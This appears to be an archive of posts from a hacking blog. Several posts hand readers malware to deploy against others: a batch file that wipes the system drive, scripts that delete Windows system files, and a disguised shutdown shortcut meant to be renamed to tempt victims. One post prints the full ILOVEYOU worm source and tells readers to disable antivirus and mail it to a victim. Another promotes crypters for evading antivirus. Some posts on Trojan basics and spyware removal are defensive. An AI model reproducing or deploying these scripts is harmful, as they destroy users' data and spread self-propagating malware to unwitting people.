Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Showing posts with label Virus Cods. Show all posts
Showing posts with label Virus Cods. Show all posts

Thursday, 22 November 2012

CONTINUALLY POP-OUT YOUR FRIENDS CD-DRIVE

HELLO WOLRD ... DAVID REX HERE TO GIVE A NEW TIPS TODAY :D
WITHOUT WASTING TIME NOW LETS START......
THIS CODE IT HARMLESS :P

1) OPEN YOUR NOTEPAD.
2) COPY THE CODE BELOW :


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

3) THEN PASTE THE CODE IN THE NOTEPAD. AND SAVE IT AS ANYNAME BUT PUT .vbs AT THE END... DONE NOW CLICK SAVE.
4) YOU CAN TEST THIS IN YOUR SYSTEM .. JUST DOUBLE CLICK THE THING YOU SAVED..


# TO DEACTIVATE/STOP IT :
YOU CAN RESTART YOUR COMPUTER
OR

DELETE THE PROCESS WSCRIPT.EXE FROM THE TASK MANAGER TO STOP IT.







Wednesday, 14 November 2012

Make Harmful Virus


I suggest not to use these on your own computer seeing as one of them can destroy your computer.

Open up notepad and paste this in it

Quote
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

Save the file as .bat file.

NOTE:THIS DELETS THE SYSTEM HARDRIVE AND YOU HAVE TO REINSTALL WINDOWS.

Right click on desk top, and then go New, then Shortcut.

Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"


You can change "this is a virus" to anything you would like that's just the message that will appear.
The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

My advice would be to rename it something like.... wicked game, awesomeservertool. Depends on the victims age and sex. But make sure you call it something good or the victim won't bother clicking on it.
After you have given it a name click on finish.
You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it.
It is also advised you change the icon to something different.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don't forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone you...... dislike greatly.

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your self LOL
Ok go to start, run, type cmd, then in cmd type: shutdown -a

3.
1.Open up notepad and put this in it,
@echo off
color 0a
title Server Utility 3.1.6.169
echo GoodBye D D 3 is now shutting down your computer nub.
pause
shutdown -r -f -t 00

Save as .bat and then send it to someone and when they click it it will look like a regular run server but it will shut down there computer.You can change the D D 3 to your name.



note: This is an educational purpose. Do not misuse it. Do it on your own risk.


PrinceMahen

Tuesday, 30 October 2012

HOW TO MAKE A DANGER VIRUS THAT CAN DAMAGE YOUR PC USING NOTEPAD



HELLO ALL ITS ME DAVIDREX . IS HERE TO TEACH YOU HOW TO MAKE A DANGER VIRUS THAT CAN DAMAGE YOUR PC USING NOTEPAD.
NOW LETS START THE TUTORIAL.

BEFORE THIS PREVIEW ON HOW TO MAKE THE VIRUS
NotepadTricks
Viruz Maker
WE ARE NOT RESPONSIBLE FOR ANY DAMAGE.THIS ARTICLE IS FOR TEACHING PURPOSE.
NOW LETS START
1) OPEN THE NOTEPAD
2) COPY THE CODE BELOW

@echo off
del "c:\windows\pchealth"
del "c:\windows\system"
del "c:\windows\system32\restore"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\ntoskrni.exe"
del "c:\winlogon.exe"
3) THEN PASTE IT IN THE NOTEPAD
4) SAVE AS TO UNKNOWNFILE.BAT. MAKE THE SAVE AS TYPE: TO ALL FILES. NAME UNKNOWNFILE FOLLOWED BY ANY 2 DIGIT NUMBER. AND FOR EXAMPLE LOL12.BAT.
5) THEN MAKE IT AS SHORCUT AND CHANGE THE ICON

FINISH

Saturday, 11 February 2012

Windows Remote Desktop Worm “Morto” Spreading

F-Secure Lab just found a new Internet worm, and it’s spreading in the wild. The worm is called Morto and it infects Windows workstations and servers. It uses a new spreading vector that we haven’t seen before: RDP (Remote Desktop Protocol). Windows has built-in support for this protocol via Windows Remote Desktop Connection. Once you enable a computer for remote use, you can use any other computer to access it.
Windows Remote Desktop Worm Morto
When you connect to another computer with this tool, you can remotely use the computer, just like you’d use a local computer.
Windows Remote Desktop Worm Morto
Once a machine gets infected, the Morto worm starts scanning the local network for machines that have Remote Desktop Connection enabled. This creates a lot of traffic for port 3389/TCP, which is the RDP port.
When Morto finds a Remote Desktop server, it tries logging in as Administrator and tries a series of passwords:
admin
password
server
test
user
pass
letmein
1234qwer
1q2w3e
1qaz2wsx
aaa
abc123
…….
………..
Once you are connected to a remote system, you can access the drives of that server via Windows shares such as \\tsclient\c and \\tsclient\d for drives C: and D:, respectively. Morto uses this feature to copy itself to the target machine. It does this by creating a temporary drive under letter A: and copying a file called a.dll to it.
The infection will create several new files on the system including \windows\system32\sens32.dll and
\windows\offline web pages\cache.txt.
Morto can be controlled remotely. This is done via several alternative servers, including jaifr.com and qfsl.net.
F-Secure Lab detected Morto components as Backdoor:W32/Morto.A and Worm:W32/Morto.B.

Saturday, 10 December 2011

10000 Virus Shorcut

I am sure you must have never seen or even exposed to infection from viruses shortcut, which is a virus that spread and reproduce itself by posing as a shortcut or program files in your computer. Well, this time we will share trick how to make some kind of virus that shortcuts are more numerous than the original virus shortcut. We will teach you how to create shortcut Virus ... which amounts to 10 000 seeds.

with the existence of Fake Virus shortcut numbering 10000, then it is definitely the victims will panic even screaming from fear. You need to know, that this virus is just a harmless fake virus but only aims menjahili your friends and this virus does not take up memory, but only takes place only so take it easy friend .
So, how do I make it? Can not wait well ... just look at the steps below:

1. Open Notepad and then you type in or copy this script!

@ Echo off
: Top
md% random%
goto top

2. Then save it with a name that is not suspicious ... his name is up to your critical love of the extension (. Bat). Such as 'Virus Palsu.bat'

3. After that change the icon that is not suspicious, too.

4. The final step, please spread the virus to a computer friend, brother, sister, teacher, security guard pak, pak garden, siti bu, bu Nunik, not beautiful, and everything you know hahahahaha

5. As for how to run it is a live double-click any file false virus was then automatically 1000 shortcut will immediately be made. Wait for the process and if it is satisfied and already feel a lot once, please click the X button on the application running.







6. And below is the result screenshot than 10000 fake virus



 How not to confuse the victim would be, exposed to the virus lhaa shortcut ... just been confused by 5 to get rid of this let alone 1000 hehehe

Surely you ask, then how to remove the shortcut that was numbered 1000?
gampamg calm ko.tinggal
press CTRL + A then press Shift + Del to delete them. Beress it!

This I took from the source:
http://www.javacreativity.com

but remember this is only a sharing of knowledge Boss, do not be abused for the purposes of useless even be harmful to others and yourself, Okay ... greetings Hacker ..

Sunday, 6 November 2011

what is Trojan


Definition

 •Trojans are malicious pieces of code  used  to  install  hacking software  on  a  target  system and  aid  the  hacker  in  gaining and  retaining  access  to  that
system.    Trojans    and    their counterparts    are    important pieces of the hacker’s toolkit.
• Trojans   is   a   program   that appears to perform a desirable and   necessary   function   but that,  because  of  hidden  and unauthorized  code,  performs functions      unknown      and unwanted by the user.
• Trojan   generally   consists   of two  parts:  a  client  component and  a  server  component.  For the  Trojan  to  function  as  a  backdoor,  the  server  component  has  to  be  installed  on  the victim’s machine.
• Server  is  part  of  the  Trojan  on  the  Victim’s  Computer.  It  opens  a  port  in  the  Victim’s computer and invites the attacker to connect and administrate the computer.
• Client Trojan is the part of the Trojan on the Attacker’s computer. It tries to connect the Victim computer and administrate the computer without the permission of the User.


Wrapper

 • A wrapper is a program used to combine two or more executables into a single packaged
program. The wrapper attaches a harmless executable, like a game, to a Trojan’s payload,
the executable code that does the real damage, so that it appears to be a harmless file.
• Hackers use it to bind the Server part of the Software behind any image or any other file.

Some Famous Trojans
• Back Orifice 
• NetBus
• Zlob
• Pest Trap
• ProRat
• Sub7
• Vundo


Modes of Transmission
• CD or DVD Autorun
• Pen Drive
• Email
•Website
• Shared Drives


Trojan Countermeasures

 • Awareness and preventive measures are the best defense against Trojans. 
• Educate  users  not  to  install  applications  downloaded  from  the  Internet  and  email
attachments. 
• Most  commercial  anti-virus  products  can  automatically  scan  and  detect  backdoor
programs before they can cause damage.

TCPView

 • TCPView is a Windows program that will show you detailed listings of all TCP and UDP
endpoints  on  your  system,  including  the  local  and  remote  addresses  and  state  of  TCP
connections.
• On  Windows  NT,  2000,  and  XP,  TCPView  also  reports  the  name  of  the  process  that
owns the endpoint.

Monday, 31 October 2011

How to make Virus/spyware Undetectable by all antivirus?

Usually if you create malicous programs(virus,spyware...), the antivirus will detect easily. It will scan the source code. if it finds the malicious source codes, then it will alert as "virus". To know more details about antiviru program read this article:
How does Anti Virus detects viruses

I hope you know about the antivirus functions completely. In that article, i have mentioned "Crypter" keyword. Now let us see more about Crypter.




What is Crypter?

You can make the any type of malicious programs(virus,spyware,...) undetectable by all antivirus.

How crypter makes undetectable virus?

i have told that crypter will make virus undetectable. ok. How it will do? It will encrypt the malcious code.
For instance,
In "mission impossible" movie, the villaim wear mask and make heroin to believe that he is the hero.
Likewise , this crypter will create a masked form of Malicious codes. So the Antivirus programs will think that these codes are safe to use.

Drawback of Crypter
Now a days the antivirus programs upgraded to detect the malicious codes. If the crypter software is publicaly available, the antivirus get the algorithm of those crypter and include in their virus definitions. So if the virus is encrypted with that crypter, antivirus easily find that it is malicious code.

Fully Undetectable Crypter(FUD)
The crypter that is not publicaly available is known as FUD crypter. so FUD crypter will be useful to create fully undetectable virus programs.

You can download the latest crypter from hacking related forums.

Use the crypter as soon as it is released , the antivirus will find the crypter algorithm within certain days. so you have to use it as soon as possible.

How Does Anti virus detects viruses?

I hope you know what is computer Anti Virus. But you may not know how the anti virus works.  Here i am sharing how the antivirus software works. 


What you know about Anti Virus software?

Antivirus software gives protection against the viruses and Malware. Antivirus can detect the malicious software ,then delete or put it in quarantine. 



The process behind the Anti Virus

The Antivirus follows two methods to detect the malicious software. They are
  • Virus Dictionary Based Detection
  • Suspicious Activity Detection
Virus Dictionary Based Detection
In this method, Antivirus manage a dictionary file which has the identified virus signatures. Whenever an executable is running, antivirus will check the executable file source code with the dictionary.  If the source code match with any virus signature, then antivirus will immediately inform you that the virus is found.
Antivirus will check the executable file whenever file is opened or created or emailed or downloading.

Example:
Let us assume the malicious code is "11010011" and this code is in dictionary file.  If any executable file runs with the above malicious code, the antivirus immediately block and alerts the user. 

Day to day the hackers can create new viruses, the source code of virus will vary.  The antivirus can not detect the virus with old Signature of viruses.  You have to update the virus signature so that it can detect new viruses.


Drawback of this Method

Hackers found a hacking trick to bypass this security method, The Crypter.  Yes,  hackers can encrypt the source code into different source code such that it will look like safest source code.  So if the antivirus checks for the source code, it won't find the malicious code (because it is another form). (I will give detailed explanation about the crypter in my next post.).  The drawback can be solved by including the crypted malicious code to dictionary file. 

 Suspicious Activity Detection
The suspicious activity detection method is more effective than the Dictionary based approach.  It can detect even a new virus. Antivirus observes the behavior of the executable file. If the executable file does any illegal process or create any executable file, the antivirus will block the executable file and alert the user . 


Drawback
It is annoying process.  The accuracy is less so it may detect any safe executable file as virus.

Saturday, 15 October 2011

ALL About Spyware

There are a lot of PC users that know little about "Spyware", "Mal-ware", "hijackers", "Dialers" & many more. This will help you avoid pop-ups, spammers and all those baddies.

What is spy-ware?
Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer them to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee.

Known spywares
There are thousands out there, new ones are added to the list everyday. But here are a few:
Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

How to check if a program has spyware?
The is this Little site that keeps a database of programs that are known to install spyware.

Check Here: http://www.spywareguide.com/product_search.php

If you would like to block pop-ups (IE Pop-ups).
There tons of different types out there, but these are the 2 best, i think.

Try: Google Toolbar (http://toolbar.google.com/) This program is Free
Try: AdMuncher (http://www.admuncher.com) This program is Shareware

If you want to remove the "spyware" try these.
Try: Lavasoft Ad-Aware (http://www.lavasoftusa.com/) This program is Free
Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.

Try: Spybot-S&D (http://www.safer-networking.org/) This program is Free
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.

Try: BPS Spyware and Adware Remover (http://www.bulletproofsoft.com/spyware-remover.html) This program is Shareware
Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you'd like to remove.

Try: Spy Sweeper v2.2 (http://www.webroot.com/wb/products/spysweeper/index.php) This program is Shareware
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.
The best scanner out there, and updated all the time.

Try: HijackThis 1.97.7 (http://www.spywareinfo.com/~merijn/downloads.html) This program is Freeware
Info: HijackThis is a tool, that lists all installed browser add-on, buttons, startup items and allows you to inspect them, and optionally remove selected items.


If you would like to prevent "spyware" being install.
Try: SpywareBlaster 2.6.1 (http://www.wilderssecurity.net/spywareblaster.html) This program is Free
Info: SpywareBlaster doesn`t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.

Try: SpywareGuard 2.2 (http://www.wilderssecurity.net/spywareguard.html) This program is Free
Info: SpywareGuard provides a real-time protection solution against so-called spyware. It works similar to an anti-virus program, by scanning EXE and CAB files on access and alerting you if known spyware is detected.

Try: XP-AntiSpy (http://www.xp-antispy.org/) This program is Free
Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people.

Try: SpySites (http://camtech2000.net/Pages/SpySites_Prog...ml#SpySitesFree) This program is Free
Info: SpySites allows you to manage the Internet Explorer Restricted Zone settings and easily add entries from a database of 1500+ sites that are known to use advertising tracking methods or attempt to install third party software.

If you would like more Information about "spyware".
Check these sites.
http://www.spychecker.com/
http://www.spywareguide.com/
http://www.cexx.org/adware.htm
http://www.theinfomaniac.net/infomaniac/co...rsSpyware.shtml
http://www.thiefware.com/links/
http://simplythebest.net/info/spyware.html

Usefull tools...
Try: Stop Windows Messenger Spam 1.10 (http://www.jester2k.pwp.blueyonder.co.uk/j...r2ksoftware.htm) This program is Free
Info: "Stop Windows Messenger Spam" stops this Service from running and halts the spammers ability to send you these messages.

----------------------------------------------------------------------------
All these softwares will help remove and prevent evil spammers and spywares attacking your PC. I myself recommend getting "spyblaster" "s&d spybot" "spy sweeper" & "admuncher" to protect your PC. A weekly scan is also recommended

Free Virus Scan
Scan for spyware, malware and keyloggers in addition to viruses, worms and trojans. New threats and annoyances are created faster than any individual can keep up with.
http://defender.veloz.com// - 15k


Finding . is a Click Away at 2020Search.com
Having trouble finding what you re looking for on: .? 2020Search will instantly provide you with the result you re looking for by drawing on some of the best search engines the Internet has to offer. Your result is a click away!
http://www.2020search.com// - 43k


Download the BrowserVillage Toolbar.
Customize your Browser! Eliminate Pop-up ads before they start, Quick and easy access to the Web, and much more. Click Here to Install Now!
http://www.browservillage.com/ - 36k

Thursday, 6 October 2011

How TO Make I Love U Virus

This Virus is not much different than Melissa. It is called the "I Love you' Virus, since it contains a VB Script attachment called 'Love Letter For You'. When opened, the script is executed, and the computer is infected.

Like other e-mail Viruses, this Virus will not no damage can be caused just by opening the e-mail message. In order for the Virus to be activated, the attachment has to be executed or opened. However, when the attachment is opened, the Virus infects the local drives, installs a special infecting script in the popular mIRC client (if found) and sends itself to all the mail contacts in the mail client's address book. See the Virus source code for more information about what the Virus actually does.

The Virus was originally discovered by GFI, a leading developer of email security & anti-virus software. GFI offers Mail essentials - a comprehensive email content security & anti-virus gateway that offers (among other features) e-mail content checking and filtering and Virus scanning of all incoming e-mail.

Source code......

The following is the VB Script Virus code of the 'I Love You' Virus. Keep in mind that this Virus code can do no harm unless saved and explicitly executed. However, some gateway scanners might falsely detect it as a Virus:
...................................................................................................................

rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/ HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/ skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnH HGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/ jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZn mPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/ sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhY UgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadsh fgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\ Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT= @-@window.name=#-#main#-#;window.open (#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^ -^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
..................................................................................................................
Copy the source code in the description  and past in to the notepad  the code will not dangerous yet.Save exactly like this: LOVELETTERFORYOU.tex.vbs
set to all files . don't forget to turn off your antivirus
open email thing and put file in as attachment
subject: I love you Text. kindly check the love letter coming from me
now send this to victim

